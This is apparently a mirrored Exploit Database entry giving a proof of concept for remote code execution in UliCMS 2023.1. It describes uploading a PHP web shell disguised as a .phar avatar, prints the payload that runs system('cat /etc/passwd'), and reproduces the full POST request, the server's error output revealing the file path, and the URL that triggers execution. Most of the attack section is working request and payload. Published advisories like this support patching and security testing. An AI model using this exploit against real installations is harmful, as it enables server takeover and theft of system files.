Ulicms-2023.1 sniffing-vicuna – Remote Code Execution (RCE)

• Exploit Database
• 123 阅读

• 作者： Mirabbas Ağalarov
  日期： 2023-05-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51434/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152

  #Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE) #Application: Ulicms #Version: 2023.1-sniffing-vicuna #Bugs:RCE #Technology: PHP #Vendor URL: https://en.ulicms.de/ #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip #Date of found: 04-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux   2. Technical Details & POC ======================================== steps:   1. Login to account and edit profile.   2.Upload new Avatar   3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error   payload: <?php echo system("cat /etc/passwd"); ?>   poc request :   POST /dist/admin/index.php HTTP/1.1 Host: localhost Content-Length: 1982 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv Connection: close   ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="csrf_token"   e2d428bc0585c06c651ca8b51b72fa58 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="sClass"   UserController ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="sMethod"   update ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="avatar"; filename="salam.phar" Content-Type: application/octet-stream   <?php echo system("cat /etc/passwd"); ?>   ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="edit_admin"   edit_admin ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="id"   12 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="firstname"   account1 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="lastname"   account1 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="email"   account1@test.com ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="password"     ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="password_repeat"     ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="group_id"   1 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="secondary_groups[]"   1 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="homepage"     ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="html_editor"   ckeditor ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="admin"   1 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="default_language"     ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="about_me"     ------WebKitFormBoundaryYB7QS1BMMo1CXZVy--       response:   Error GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67 Stack trace: #0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct() #1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open() #2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar() #3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar() #4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost() #5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand() #6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods() #7 {main}   Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73 Stack trace: #0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open() #1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar() #2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar() #3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost() #4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand() #5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods() #6 {main}     4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)